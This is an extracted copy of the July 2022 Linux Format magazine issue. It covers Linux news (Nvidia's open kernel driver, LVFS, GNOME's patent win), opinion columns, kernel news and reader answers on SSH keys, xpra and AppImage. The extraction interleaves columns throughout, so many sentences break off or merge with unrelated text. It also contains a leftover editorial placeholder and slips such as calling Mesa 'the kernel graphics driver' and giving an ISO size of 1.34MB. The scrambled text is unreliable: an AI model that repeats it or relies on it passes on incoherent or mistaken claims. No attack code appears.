THE BEST OPEN SOURCE CMS

We test the most powerful website systems for you to run!

Enhance your Pi builds

with essential sensors
The #1 open source mag

Don your black hoodie and discover the most

formidable tools for defending your systems! 2O22
PLUS: HOW TO
Run industrial virtual Build
machines in Portainer your own
Design and create 3D smart home
objects with FreeCAD devices
Emulate the classic
Commodore 16

GET IT PACKED! RUST FILE TOOLS LINUX IN SPACE!

LXF July 2022

Create your own Code your own secure How Tux was launched
open source projects filesystem commands into orbit by SpaceX

MEET THE TEAM
This issue’s lead feature reveals the
benefits of hacking in the real world,
so we wondered what life hacks our
contributors like to use…
Jonni Bidwell
If you’re lucky enough to have a garden, don’t
waste time digging up the dandelions on your
lawn! They’re good for the soil and will help
grass grow. You can eat the flowers and in the
autumn boil up the roots. Nettles and cleavers
are good in soups, too. Dandy.
. murky mainstream media portrayal of the hacking world.
Matthew Holder
My life hack is home automation. Whether
being alerted to appliances completing their
cycles, being told what bins need putting out
or the kids being able to switch the lights on
by uttering a magical incantation, I wouldn’t
be without it! Now to make sure it works reliably 24/7…
Nick Peers
I mix bokashi bran (widely available from
eco stores and online outlets) with my food
waste. Not only does it reduce odours and
speed up the decomposition process, it
means that I can safely compost a wider
range of foods, including cooked meats.
Les Pounder
I use serial consoles a lot, but connecting to
MicroPython REPLs on ESP32s, Raspberry Pi
Picos and a myriad of Arduino serial consoles
can be a chore. My solution is to use tio
(https://github.com/tio/tio), a simple serial
console tool. I just point tio at the port and it just works.
Michael Reed
Spelling numbers is a useful technique to
create a long password that’s easy to
remember. “sixfivefourXx” is “reasonably”
strong and easy to type. It’s also easy to pass
on to another person. The uppercase and
lowercase letters at the end are also easy to remember and
increase the strength of the password.
www.techradar.com/pro/linux
WELCOME
Open source
security
Jonni’s playing with his little bag of
open source hacking tools this
issue. It should come as no surprise
that they’re all open source, with
the collaborative community
development being more a way of
life for the hacking community.
From the heights of the DEF CON
conferences, through to the open
communities surrounding the big-
name tools like Kali Linux, and to
general online forums, there’s an
awful lot of people explaining how
hacking works and how to use the tools. It’s in stark contrast to the
The less-exciting truth is that, for many, the best defence is
an updated and patched system. As we reported in LXF288,
a Google study demonstrated that open source developers are
best placed and experienced at delivering timely security fixes.
Furthermore, all the big distros – especially the commercially driven
ones – offer up-to-the-minute patches.
You might not like it, but it’s one thing Microsoft did get right was
forcing security updates. Its big failure, however, was offering its
customers an open way to upgrade out of date operating systems,
but then its inability to enable users to upgrade is somewhat
inevitable due to its proprietary nature. Windows 7 (the 12-year old
OS) still accounts for 12 per cent of online Windows users. That’s
more people than those running Windows 11.
It’s a blessed relief having access to the latest releases. This
is something that open source users don’t have to worry about
on the whole, and it’s why every issue we can offer a packed
assortments of tutorials like Portainer, Commodore 16 emulation,
FreeCAD, packaging software and commercial-scale CMS systems.
It’s amazing and it’s secure, so enjoy!
Neil Mohr Editor
[email protected]
Subscribe
& save!
On digital and print
– see p16
July 2022 LXF290 3
Contents
REVIEWS
SUBSCRIBE NOW!
Page 16

AMD Ryzen 7 5800X3D 19

Dave James contemplates what it means
for a processor that’s supposed to help
games run faster but on Linux has its
strengths with machine learning…

TurnKey Linux 17.0 20

Lethargy and laziness often get the best of
him… <write more words for me here – MS>
but sometimes Mayank Sharma can turn
the tables to his advantage.

Rolling Rhino Remix 21

A rolling Ubuntu release sounds so
outrageous Mayank Sharma had to see
for himself if it really delivers on its word
and isn’t just a gimmick.

SysLinuxOS 11.3 22
Distros that take the kitchen sink approach
don’t really appeal to Mayank Sharma who
enjoys owning a dishwasher… until, of
course, he finds one that does.

Q4OS 4.8 23
Neither a big KDE user nor a fan of
Windows, and yet Mayank Sharma can’t
resist the charm of this KDE distro and
ROUNDUP IN DEPTH
its Windows installer.
Linux in space!
Shattered Pixel Dungeon 25 52
The only certainties in life are death, taxes From a shaky
and middle management, and Neil Mohr start, Linux is
knows which two are the least painful of now blasting off
those to deal with. in the tricky
astronautics
arena. Mike
Bedford takes a
look at its
Full-featured CMS 26 successes and
Michael Reed takes a good look at five what its future
heavyweight professional content could be in a
management systems that are all open galaxy that’s not
source and completely free. far away at all!

4 LXF290 July 2022 www.linuxformat.com


Pi USER
Raspberry Pi news
Introduced by Tom’s Hardware’s Les
Pounder. A rock-hard Pi competitor
appears, Pi GPUs and Astro Pi projects.
Amiberry 5.0
Les Pounder loves the Amiga – he started
his career with custom “disk magazines”.
Pimoroni Servo 2040
Learn how to achieve precise motion
control from Les Pounder’s tiny package.
Cheap sense and sensor-abilities
The ever-frugal Les Pounder reveals two of
the cheapest sensors on the market that
can bring a pile of data to your Pi project.
Build your own smart sensors
Discover how to install micro controllers
and simple electronics to make our homes
almost as smart as Matt Holder.
Mobile streaming video
Sean Conway helps you ride the rails with
a Raspberry Pi and its camera.
CODING ACADEMY
Code read/write filesystem tools
Did you wake up wanting to know how to
use file I/O calls to code system tools in
Rust? Then Mihalis Tsoukalos can help.
Home Assistant NodeRED devices
NodeRED is a graphical language that’s
ideally suited to IoT, electronics and home
automations, reveals Matt Holder.
REGULARS AT A GLANCE
News
Nvidia’s open source kernel drivers, Fwupd
serves 50 million updates, the Razor Linux
laptop, Gnome wins patent spat, GitLab
moves to AlmaLinux and Firefox hits 100.
Kernel watch
Answers
Configuring laptops for running Open
Broadcaster Software, configuring SSH
access on a server, X forwarding issues,
using scanners and read-only USB.
Mailserver
Shock at how we get the history of RISC OS
so wrong, more shock at us actually crediting
Tommy Flowers, shock that 32-bit isn’t
widely available any more, shocking stuff!
www.techradar.com/pro/linux
CONTENTS
TUTORIALS
41 TERMINAL: Presentations 56
Although renowned for making far better
excuses than cocktails, Shashank Sharma is
quite adept at making presentations and now
can do them from the terminal.
42
PORTAINER: Control Docker 58
Nick Peers discovers a user-friendly,
convenient and powerful way to administer
43 your Docker containers from wherever you
happen to be.
EMULATION: Commodore 16 62
44 Les Pounder revisits Commodore’s low-
cost computer from the mid-80s and
finds out how it compares to its more
illustrious stable-mate.
46
50
PACKAGES: Roll your own projects 68
Installing from existing repos is too easy
92 for Aaron Peters. He builds his own native
packages DIY-style and you can too with
his in-depth Debian guide.
FREECAD: Design 3D models 72
96 Make a 3D part in FreeCAD’s Sketcher
workbench with Michael Reed, even if
you think an orthographic view is the
inside of someone’s mouth.
LXF SERVER: Photoprism 76
In a flurry of paranoia, David Rutland expels
Google Photos from his life and sets up his
6 Subscriptions 16 own self-hosted photo storage on the semi-
Get your monthly Linux dose and save cash! official Linux Format VPS.
Back issues 66
Get hold of previous Linux Format editions.
TOP OF THE FOSS!
10 Overseas subscriptions 67
Get Linux Format shipped around the globe.
11
HotPicks 85
Mayank Sharma takes the helm of the good
ship Hotpicks, helping us to navigate the
tricky open source waters and uncover
fine software bounty such as CherryTree,
14 Sherlock, Simple Keylogger, Siren, MediaInfo,
Mechvibes, yt-dlp, Eternal Lands, Speed Top of the Pop!_OS 80
Dreams, Snap Backup and ugrep. System76 developer Michael Murphy
shares his Pop!_OS insights with top
Next month 98 Pop fan Jonni Bidwell.
July 2022 LXF290 5
Newsdesk
THIS ISSUE: Nvidia drivers LVFS update milestone Razer’s
Linux laptop GNOME patent victory Firefox reaches version 100
DRIVERS
Nvidia moves to open
source kernel drivers
After decades of being lambasted for its refusal to open source its
drivers, Nvidia announces it’ll transition to an MIT licenced version.
F
or over two decades the Linux
community has watched from the
sidelines as Nvidia offered market-
leading GPU and compute performance, but only
through a proprietary driver stack. Yet ever since
AMD moved to an open source driver with much
success, the pressure has been growing on
Nvidia to do the same. Finally the company has
decided to do the smart thing and transition to
an open source kernel driver.
There have been indications in recent years
that Nvidia was finally succumbing to pressure
and developing open source components. Such
signs include an Nvidia Tegra driver in early 2022
and being more helpful towards the open soure
Nouveau Nvidia driver project.
New from Nvidia is an out-of-tree kernel driver
that so far has only been tested with CUDA and
datacentre GPUs with only basic display
functionality. This makes sense because this is
where the business-end pressure will have been
coming from. Red Hat developers have worked
closely with Nvidia to ensure this happens
smoothly. The driver currently only supports
Nvidia Turing and newer GPUs, so anything pre-
2018 is currently out, while the userspace and
firmware elements will remain proprietary.
This means the binary driver will be the one
that most users will continue to use, so not only
for pre-Turing Nvidia GPUs but also for those
running more recent cards, until the kernel
module is fully tested for desktop display use.
Critical to Nvidia’s strategy is what happens to
the existing Nouveau open source driver in the
6 LXF290 July 2022
long term, because the kernel
doesn’t allow two drivers for the
same hardware. In a blog post
(https://bit.ly/lxf290gnome)
Christian Schaller outlines how over
the coming years Mesa (the kernel
graphics driver) Nivida and Nouveau
will have to be designed to work
together, which will pay dividends all
round. Nouveau can access enhanced features Initially, Nvidia’s support is only for
currently blocked while Nvidia gains day-one Turing and newer GPUs that are
kernel update access and more. running in data centres.
A transition like this doesn’t happen over
night. Given the complexity of the subject, the
NVIDIA’S FIRST FOSS STEPS
“New from Nvidia is an out-of-tree
kernel driver that so far has only been
tested with CUDA and datacentre GPU”
range of supported GPUs, the critical industries
that will use this and more means the
community is looking at a necessarily lengthy
transition period of years. In the short term you
won’t be seeing any real change, but ultimately
Nvidia’s decision has the potential to offer a
hugely simplified support process and unified
day-one kernel support down the line, which is a
huge step forward. You can read the official
Nvidia post here: https://bit.ly/lxf290nvidia.
www.linuxformat.com
 NEWSDESK

SOFTWARE OPINION

LVFS hits 50 million updates BLUETOOTH

The Linux Vendor Firmware Service has now IN PIPEWIRE
delivered a huge 50 million updates for
computers around the world.

R
ichard Hughes, a maintainer of GNOME
software (among other things)
highlighted in a blog post that the Linux
Vendor Firmware Service (LVFS) has now
delivered a remarkable 50 million updates. LVFS
(https://fwupd.org) is a secure portal for
uploading and distributing firmware updates.
As Richard explains in his blog (https://bit.ly/
lxf290gnomeblog), “Just seven years ago
Christian [Schaller, director for Desktop,
Graphics and Infotainment at Red Hat] asked me
to ‘make firmware updates work on Linux’ and
we have a thriving client project that respects
both your freedom and your privacy, and a
thriving ecosystem of hardware vendors who
consider Linux users first-class citizens.”
Richard’s blog post also
celebrated the release of
fwupd 1.8.0. This is an open-
source daemon that’s used
for installing firmware
updates. It’s well worth
checking out the release
notes at https://bit.ly/
lxf290fwupd for a full rundown of what’s new in
the latest version of the daemon.
LAPTOPS
As for LVFS, Richard is now looking towards
“the next 50 million updates”, and highlights how
fast LVFS has been growing since its launch, with Frederic Danis
it now “we regularly ship more than 2m updates is a senior software engineer
a month.” A large part of this growth, according at Collabora
to Richard, is thanks to Google. “The tech giant
has been an amazing partner in encouraging
vendors to ship updates on the LVFS and Over the past two
shipping fwupd in ChromeOS.” years, Bluetooth audio
Richard also hints at “super” secret things support has steadily grown
coming, while also promising to “push the in PipeWire and has become
ecosystem towards transparency, open source a featureful, stable,
and respecting the user’s privacy.” Thanks to the conformant, open source
LVFS portal, using Linux on a range of devices is Bluetooth audio stack
easier and more user-friendly than ever. implementation.
Testimony to that is the
fact that Bluetooth A2DP
audio has now been
qualified on the Steam
Deck using PipeWire and
WirePlumber. This means
that it’s now able to pass the
conformance test suite from
the Bluetooth SIG and will
LVFS is a portal that enables hardware manufacturers to work against other qualified
securely upload firmware for their products. implementations.
Of course, development
doesn’t stop here. There are
still several things to fix and
new features to support as
the industry moves forward.

Razer releases stylish Linux laptop One particular feature that

we’re looking at next is the
addition of the LC3 codec.
Collaboration between the high-end laptop company LC3 is the successor of
SBC for use in the LE (low
and Lambda is powerful… and expensive. energy) audio profile, a new
profile that was added in

R
azer is known for its powerful laptops
aimed at gamers and creatives. One
of its latest laptops, the Tensorbook,
combines Razer’s trademark style and power,
and comes with Linux preinstalled.
The specs are certainly impressive, with an
Intel Core i7-11800 CPU, Nvidia GeForce RTX
3080 Max-Q graphics card, 64GB of DDR4
RAM and 2TB SSD storage, along with a 1440p
resolution screen with a 165Hz refresh rate. If
those look like the kind of specs you’d usually
see in a gaming laptop then you’d be right.
However, rather than gaming, this is designed
for machine-learning tasks – something the
RTX 3080 GPU does particularly well. It also
comes with Lambda software, such as PyTorch Bluetooth 5.2. This profile is
and TensorFlow, and Ubuntu 20.04 is preinstalled. meant to improve battery
The device isn’t cheap: prices start at $3,500 life, enable audio
(around £3,000), and if you want to pay extra to broadcasting to multiple
dual-boot Ubuntu and Windows then the cost devices and also support
rises to $4,999 (around £4,000). hearing aids.
It’s certainly a stylish-looking laptop, but as Supporting this new
Tom’s Hardware points out (https://bit.ly/ profile requires work
lxf290tomshardware), Razer sells similar- underneath PipeWire,
specced laptops for less. If you’re looking for a in BlueZ, but until that’s
laptop that runs Linux, while also offering ready we can also use LC3
incredibly powerful components for machine- on the A2DP profile and be
learning tasks, then you can check out the prepared for LE Audio when
Tensorbook from Lambda’s own website at the rest of the stack
https://bit.ly/lxf290tensorbook. is ready to support it.

www.techradar.com/pro/linux July 2022 LXF290 7

NEWSDESK
OPINION
GOING FOR
GOLD!
Keith Edmunds
is MD of Tiger Computing Ltd,
which provides support for
businesses using Linux.
A would-be client put
in a request: “Can you give
us a gold disk so that we can
create more servers?” Now I
needed to tell them that,
unfortunately, they’re asking
the wrong question.
In case you’re unaware, a
“gold disk” was a CD image
that was used to create
multiple, very similar
systems. This approach had
numerous disadvantages:
the software versions were
baked into the CD; changes
to the configuration meant
creating a new CD; and
so on.
Surely there’s a better
way? As it happens, yes
there is. Far more flexible,
far more powerful these
days is a configuration
management system. I’ve
mentioned them before, but
if you have more than one
Linux server then you
should be using something
like Puppet, Ansible or Salt
to manage them.
So why was the request
for a gold disk the wrong
question? Because instead
of asking for help to solve
a problem, it’s asking for
help to implement a poor,
pre-determined solution to
the problem.
Each time you think,
“Surely there’s a better
way?”, then take a deep
breath, sit back and relax.
It’s 99 per cent certain that
there is. This is, after
all, Linux.
8 LXF290 July 2022
PATENTS
GNOME patent troll is
finally stomped on
Rothschild Patent Imaging (RPI)
forced to give up its patent rights.
A
fter years of pursuing a predatory
patent lawsuit against GNOME’s
Shotwell software, the US patent office
has moved to strip Rothschild Patent Imaging
(RPI) of its patent rights. In 2019, RPI went after
GNOME, claiming its software infringed on its
Patent No. 9,936.086.
Despite the valiant efforts of the open-source
community, which helped raise $150,000 to help
defend the project against the claim, in the end
the GNOME Foundation settled with RPI. This
was a disappointing development, especially for
people who feared that it could encourage other
patent trolls, but there’s been an encouraging
SERVICES
GitLab moves
to AlmaLinux
Development comes after
CentOS 8 enters End of Life.
R
ed Hat’s controversial decision to End
of Life (EOL) CentOS 8 in December
2021, in favour of CentOS Stream (see
LXF274) continues to have ramifications, with
GitLab (https://about.gitlab.com) the latest
high-profile project to switch to an alternative.
In a blog post (https://bit.ly/lxf290gitlab
move), it’s been confirmed that the platform for
software development and delivery has moved
to AlmaLinux (https://almalinux.org/). DJ
Mountney, engineering manager, Distribution
Build at GitLab, explains. “With CentOS going
EOL, we needed to choose a build platform to
replace our Centos8 build machines,” going on
to say that “We needed a ‘boring’ solution, and
AlmaLinux was asked for by our users.”
While we’re unsure how happy the AlmaLinux
team will be with the software being labelled
‘boring’, this shows just how unpopular Red Hat’s
move has been. “AlmaLinux is very excited to
be the stage to GitLab’s rockstar,” said Jack
Aboutboul, community manager for AlmaLinux.
GNOME was targeted by a patent
troll over its Shotwell software.
twist, with patent lawyer McCoy Smith, the
founder of LexPan Law (www.lexpan.law) filing a
re-examining proceeding against RPI’s patent,
where he pointed out that the patent was not for
a new invention (which often happens with
patent trolling). The US Patent Office agreed
with McCoy’s argument, so any claims against
the patent have been cancelled and it can no
longer be used for future claims.
The success in targeting the patent directly is
certainly encouraging. The expectation is that
future patent trolls will be put off from targeting
open source projects, especially after RPI’s initial
success against GNOME.
WEB BROWSERS
Firefox hits 100
Mozilla celebrates version
100.0 of its famed browser.
M
ozilla recently celebrated the 100th
version of its open-source web browser,
Firefox. After 17 years, Firefox remains
one of the most popular browsers, despite
Google Chrome’s dominance, and as the Firefox
team state in a blog post celebrating the release
(which you can read at https://mzl.la/3kWIxID),
that using its web browser “contributes directly
to a better web, keeping it open and accessible
to all.” Firefox 100.0 brings an improved Picture-
in-Picture mode, with wide support for video
captions, better spell checking and installation
process. This new version looks to be great for
media, with HDR video support on Mac, and
hardware-accelerated AV1 video decoding.
Firefox has hit version
100, and brings some
decent media-playing
features with it.
www.linuxformat.com
 NEWSDESK

Distro watch
OPINION

PLAN FOR
What’s down the side of the free software sofa? THE FUTURE
FEDORA 36
Fedora 36 is now available to download, which comes
with GNOME 42, and now most applications have been
ported to GTK 4. It also includes Ansible 5, which the
release announcement (https://bit.ly/lxf290fedora)
claims will make “maintenance easier and allows you to Matt Yonkovit
download only the collections you need.” Fedora Server is the head of open source
has also been updated, and the Cockpit tool now offers strategy at Percona
a module for administering NFS and Samba shares,
making it easier to share files over a network. Fedora is a hugely popular distro, and
version 36 has now been released. What were the leading
technologies of 2002? Linux
was only 11 years old, the
PROXMOX VE 7.2 cloud was in its infancy, and
A new version of this Debain-based distro has been iPhone and Android would
released as a ‘Virtual Environment’, and comes with an Proxmox VE 7.2 brings numerous updates not exist for another five
updated kernel (to 5.15.30) and ZFS support. It’s now to the virtualisation platform. years. While some of the
based on Debian 11.3 and features various package developments we have today
upgrades. This open-source virtualisation project makes might have been predictable,
it possible for you to run virtual appliances and virtual there are others we could not
machines, and you can find out more about the distro at know. Twitter, for example.
https://bit.ly/lxf290proxmox. So how can we look 20
years into the future and see
what the world of open source
and data will look like?
We have to look at which
platforms will continue to
TAILS 5.0 grow. PostgreSQL has a
Tails, the popular Debian-based live DVD/USB distro strong argument to be that
which aims to offer complete anonymity when using the platform. It isn’t beholden to
internet, has a new version that’s available to download. any one vendor that supports
It’s the first version to be based on Debian 11, and how it develops, which should
various tools have been updated. Furthermore, new ensure longevity. And it’s used
OpenPGP tools have been included – including within multiple companies’
Kleopatra, which replaces the OpenPGP Applet. For a The Amnesic Incognito Live System offerings and products too,
full rundown of the new version, check out the release (better known as Tails) makes it possible which should keep the
announcement at https://bit.ly/lxf290tails. for you to browse the internet in developer base interested too.
complete anonymity. Why should this matter to
us? The role of data in
businesses is only going to
grow. Social media and online
businesses use the data we
EXTIX 22.5 create to build their products.
ExTiX 22.5 is available to download, and is now based Open source is critical in how
on Ubuntu 22.04. As usual, the ISO image is all those systems will be put
impressively small – just 1.34MB, which enables it to together, as well as ensuring
run from your PC’s RAM for incredibly fast performance. that the voice of the user gets
If you want to create your own live installable Ubuntu heard in that process. Picking
22.04 system, you can do it using Refracta Snapshot in the right platform for this, like
a process the team claims is “so easy that a 10-year old So easy a 10-year old can use it, is a saying PostgreSQL, can help.
child can do it.” We’re not too sure about that, but you you don’t often attach to Linux tools. PostgreSQL can be the
can find out more at https://bit.ly/lxf290extix. database development
interface of choice for the
next 20 years, if we make it
more accessible, and
listen to users.

www.techradar.com/pro/linux July 2022 LXF290 9

NEWSDESK
OPINION
OPEN
NVIDIA
Jon Masters has been involved
with Linux for more than 22 years.
Rather surprisingly I can
happily write about the
release of an actual open source
graphics driver released by
Nvidia. This has been a long time
coming. I don’t expect to say this
often (I’d love to be proven
wrong), but kudos to Nvidia for
the engagement with open
source. That said, it’s not as
“open” you might assume, but
it’s still a dramatic improvement
upon where we were.
When you think about it, it’s
less surprising that Nvidia would
do this now. It’s finally getting
more competition (from Intel,
which know how to do open
source graphics drivers), the
“crypto” market is tanking, and
there are emerging opportunities
in edge and HPC that would be
much better served by providing
open source drivers for users.
Those deploying large
HPC clusters are likely to be
unimpressed by needing to also
deploy a giant proprietary binary
blob into their kernels.
I must confess to only having
used the proprietary Nvidia
driver on very rare occasions,
mostly on principle. In fact, this
kept me from buying its
hardware for a long time, and
consequently meant that I didn’t
play with technologies like CUDA
until they were already quite
mature. I would be quite
surprised if there are people who
haven’t felt a need to ultimately
touch those proprietary drivers,
such is their reach, but this move
could even drive sales.
Perhaps this is also a reminder
of the value served in staying
strong and sticking to core
principles. The community
pushes back for years, and
adding GPL_ONLY kernel
symbols may have made
the ultimate difference.
10 LXF290 July 2022
KERNEL WATCH
Jon Masters summarises the latest happenings in
the Linux kernel, because someone has to…
L
inus Torvalds announced that the
5.18 kernel, still under development
at the time of writing with Release
Candidate (RC) 6 being out for testing,
“seems to be quite well-behaved” and was on
track for release. He noted that 5.18 was on
track to be “one of the larger releases in
numbers of commits”, coming close to the
size of 5.14. While he was still “expecting the
other shoe to drop”, it seemed likely the final
release was not far away. We’ll have a full
summary of the new shiny 5.18 kernel
features in the next issue.
Nvidia opens up its graphics drivers... a
little. Rare is the historical occasion in which
“open source” and “Nvidia” have been used
positively in a sentence together. For many
years, Nvidia has faced the ire of kernel
developers (famously including Linus
Torvalds and a certain finger) because of its
lack of interest in working with the open
source community. It was, then, shocking to
see an announcement come out of the blue
that Nvidia is opening up its drivers.
Nvidia GPUs, of course, are dominant
among gamers, enthusiasts and datacentre
consumers alike. They have singularly fuelled
much of the growth in high-end gaming,
machine learning, and even “crypto” mining
over the past decades. But for nearly all of
that time, using an Nvidia GPU has come with
a certain amount of pain. The Linux drivers
offered by the company aren’t upstream, and
ONGOING DEVELOPMENT
Preparations for the upcoming Linux
Plumbers Conference (LPC) continues.
This year’s conference returns once again
to having an in-person (hybrid) component
and will take place in Dublin on 12-14
September. Among the sessions being
prepared is a miniconference dedicated to
RISC-V, which Atish Patra announced.
A lengthy thread took place on the subject
of debugging VirtualBox with the 5.18-rc1
kernel. While the original bug reporter
was likely incorrect in their analysis or
assumptions, it was an interesting read.
Search for “Changes in kernel 5.18-rc1 leads
to crashes in VirtualBox”.
used to require loading a huge binary blob into
the kernel, wrapped with a small shim to
massage the interface between the two. Getting
“out of the box” support was challenging to
impossible, depending upon the Linux distro.
Things began to improve slightly a decade
ago with the release of the “Nouveau” drivers,
which are in upstream Linux today. This is a
clean room, reverse-engineering effort of the
proprietary drivers done by the community.
To that end, it’s amazing how far the “out of
the box” experience has come from a graphics
point of view. It’s possible today to buy a system
with an Nvidia GPU and actually have Linux
distros boot on it without having to jump
through too many hoops. All of that is thanks to
Nouveau. But for all that positive news, there
remained no means to drive Nvidia’s CUDA
GPGPU stack, nor achieve certain functionality,
without installing the proprietary driver.
And this is how it seemed things would
remain. Until in May Nvidia announced an “open
source” driver... sort of. The reason for using
quotes is that, while the driver is actually open
source (and even under a suitably compatible
licence), it appears simply to remove much of
the proprietary blob out of the kernel and into
firmware. The kernel thus makes calls that are
still wrapped, but in a slightly different manner.
While this isn’t to everyone’s taste, it’s still
tremendous progress. There may yet come a
day in which official upstream drivers are
supported by Nvidia.
Kirill A Shutemov (senior Linux software
engineer at Intel) posted updated patches
to implement support for “unaccepted”
memory. These are part of many different
patch series in aid of enabling confidential
computing technologies such as Intel TDX
and AMD SEV-SNP.
Confidential computing protects virtual
machine instances from being analysed by a
(malicious) hypervisor. Enabling it requires
that memory by specifically “accepted”
by a virtual machine and handed off to it,
but this can be costly. Kirill’s solution was
to add support for late binding this process
in his patches.
www.linuxformat.com
 Answers
Got a burning question about open source or the kernel?
Whatever your level, email it to
[email protected]
Q MIN RAM & CPU 4 OBS
I need to prepare a number of
(identical) laptops for use in seminars.
They’ll be equipped with a webcam,
a USB microphone, and an external
monitor with speakers. The setup will
be used to record role play exercises
and play them back to the participants.
Software would be OBS and VLC, on a
system running Fedora (mainly because
I use it every day and thus know it).
Now, how much hardware is needed?
We can’t miss out on sound bits or get
frame rate of one per second only, so
sound 48k, 30fps at 1080 video stream.
But I can’t go out and buy a number
As with any video-processing software, OBS benefits from plenty of RAM.
A QUICK REFERENCE TO… APPIMAGE
Generally, installing software on Linux
is easy. You open your distro’s package
manager, find the package you want
and hit the Install button. The package
manager sorts out any dependencies or
conflicts associated with the package.
However, what happens when the
software you want isn’t in your distro’s
repository? You then have to download
the source, install the dependencies and
compile from scratch – and after all that
you have to keep up with updates.
The good news is that an increasing
number of projects are releasing their
www.techradar.com/pro/linux
tick smoothly
of laptops to try to figure out which
stutters, and I can’t just blow the budget
and buy the best. Do you have any
guidance on minimum requirements,
especially for processor and memory?
Hendrik
A This is one of those “how long is
a piece of string” questions. As it
happens, I was at a presentation on using
OBS at a LUG meeting only two days ago,
so I emailed the presenter for his advice.
OBS itself isn’t particularly demanding –
it’s the streaming video and audio that
matter. Anything short of a bargain-
basement laptop should have a CPU able
to handle the demands
you put on it, unless
you’re considering
real-time mixing or
transcoding of video
streams. You’ll also need
fast enough storage. A
decent internal SSD
device is more than
enough for this, but avoid
using external USB
storage as you want your
USB bandwidth available
for the video and sound
inputs. The most
important resource is
memory, which is true for
so many applications.
software as AppImages. This is a single
file that contains not only the compiled
application, but all of its dependencies
too. You don’t even have to unpack the
file, just set the executable bit and run it:
$ chmod +x neatprogram.AppImage
$ ./neatprogram.AppImage
The catch is you end up with extra
copies of libraries inside the AppImage
that you probably already have on your
system, and program startup is slower as
the AppImage has to be mounted – the
AppImage file contains a compressed
filesystem. On the plus side, there’s
Neil
Bothwick
tweaks your
troublesome
Tux to make it
Make sure that any laptops you
consider have removable memory, so that
it can be updated later if you need to. Some
slimline laptops have the memory soldered
to the main board and can’t be upgraded.
Ideally, a laptop with a free memory slot, so
you can upgrade by adding another stick
without having to throw away your existing
RAM, would be best,
One way to get a good idea of what’s
needed is to set everything up on a virtual
machine, using something like Qemu or
VirtualBox. Then you can experiment with
the amount of memory and the number
of CPU cores (the actual CPU speed
is locked to the host’s real CPU). Once
you’ve identified the lower limits, you can
add a reasonable safety margin to get the
ideal minimum spec. Bear in mind that
operating systems and software tend
to become more demanding with each
upgrade, so make sure you have enough
leeway to cope with future demands.
Q Restricted SSH
If have two servers that I want to
be able to run commands on over SSH
without entering a password. I believe
it’s possible to set up SSH without a
password, but I would rather not give
unrestricted access to my servers.
Can I restrict SSH sessions to just
the command I want to use?
Sam Wallis
only one file to download. You do it as a
normal user without any need for root
permissions, and updating is as simple
as downloading a new AppImage.
If all this is still too much work for
you, check out AppImage Launcher
(https://github.com/TheAssassin/
AppImageLauncher). This is a GUI
that adds AppImage software to your
desktop menu, removing the need for
any terminal work. And if AppImage
Launcher isn’t available for your distro
then it’s not a problem – just download
it as an AppImage!
July 2022 LXF290 11
ANSWERS
A You can allow passwordless logins
over SSH by using keys. The first
step is to generate SSH keys on the client
machine (if you’ve not already done so)
with this command:
$ ssh-keygen -t ed25519
When prompted for a passphrase, just
press Enter. We’ve used the ed25519 key
type here. The man page details the other
options, but this is a good one to use.
You’ve generated a two-part key in ~/.ssh,
now you need to copy the public part of
this to the server, where it’s stored in the
~/.ssh/authorized_keys file. You could edit
the file manually, but there is a command
to do this for you. On the client, run:
$ ssh-copy-id -i ~/.ssh/id_ed25519.pub
user@server
It’ll ask for that user’s password on
the server and then copy the file. Repeat
the copy process for each of the servers.
This gives passwordless access to your
servers. It isn’t unrestricted. Only your user
on your client machine can gain access,
and only as the remote user to which the
ID was copied, but that user can then run
any command. You can set an SSH key to
only be used for a single command in the
authorized_keys file by adding:
command=”/path/to/command” to the
start of the line giving the key, so it looks
something like:
command="/path/to/command” ssh-
ed25519 AAA..... user@hostname
Now, when that user connects via SSH,
the specified command is run immediately,
and commands given on the SSH
command line are ignored. While mainly a
security measure, this is also a convenient
way of setting up short aliases to complex
commands by setting a Host entry ~/.ssh/
config that says to use the SSH key that’s
locked to the command you want.
For further security, you can disable all
other SSH logins by that user, even with a
password. Edit /etc/ssh/sshd_config on
the remote machine to set:
Match User username
PasswordAuthentication no
Q SluggiSSH forwarding
I occasionally use X forwarding
over SSH to run remote graphical
programs on the local display, like this:
$ ssh -Y user@hostname someprogram
The graphics seem to update more
slowly these days. I spend too much
time waiting for displays to redraw. I also
have a problem sometimes when the
connection drops or I close my laptop’s
lid, forgetting that this suspends it. This
causes the remote program to terminate,
losing any work I’ve done.
Is there a way to speed up X
forwarding, and is there a way to make
12 LXF290 July 2022
sessions persistent – similar to terminal
sessions with screen or tmux? I know
about remote desktop software, but I just
want to run a single application remotely.
Ryan Barnett
A X forwarding is slower these days.
This is how GUI toolkits work in a
way that’s effective when the X server and
client are the same machine, but it’s
horrendously laggy when making round
trips over the network – even a fast
Ethernet connection. One solution to both
of your problems is a program called xpra
(https://xpra.org). Install this on both
computers (it should be in most distros’
repositories), than start up a program from
the local computer:
$ xpra start ssh://user:password@
hostname/ --start=someprogram
This should open the program from the
remote machine on your local desktop,
and run a lot faster than when using
X forwarding. You can also detach the
connection while leaving the program
running on the remote system with
$ xpra detach ssh://user:password@
hostname/
Then you can reconnect, possibly from
a different computer, with:
$ xpra attach ssh://user:password@
hostname/
If you have more than one session
running on the remote computer, how
does it know which one to attach to? The
answers is, it doesn’t. This command only
works if there’s one session, otherwise, use
xpra list to see the available sessions and
then specify the one you want. Full details
are in the man page and on the web site.
You said that you only wanted
forwarding of individual applications, not
the desktop, but it’s worth knowing that
xpra can do that too, so no need for a
separate program or server. You can do this
in one of two ways:
Xpra runs remote programs on X without the delays that often afflict X forwarding.
$ xpra start-desktop --start-child=fluxbox
ssh://user:password@hostname/
$ xpra shadow ssh://user:password@
hostname/
The first opens a new desktop session,
the second shadows the existing desktop.
Giving your login credentials on the
command line is a bad idea, because
it means any use on the system can
view them with ps. Because xpra uses
standard SSH protocols, setting up key
authentication for SSH means it’ll also
be used for xpra and you can omit the
password. If the username is the same on
both systems, you can drop that too.
Q Don’t cross the streams
This is the output of the nut-
scanner -U command:
# nut-scanner -U
SNMP library not found. SNMP search
disabled.
Neon library not found. XML search
disabled.
IPMI library not found. IPMI search
disabled.
Scanning USB bus.
[nutdev1]
driver = “usbhid-ups”
port = “auto”
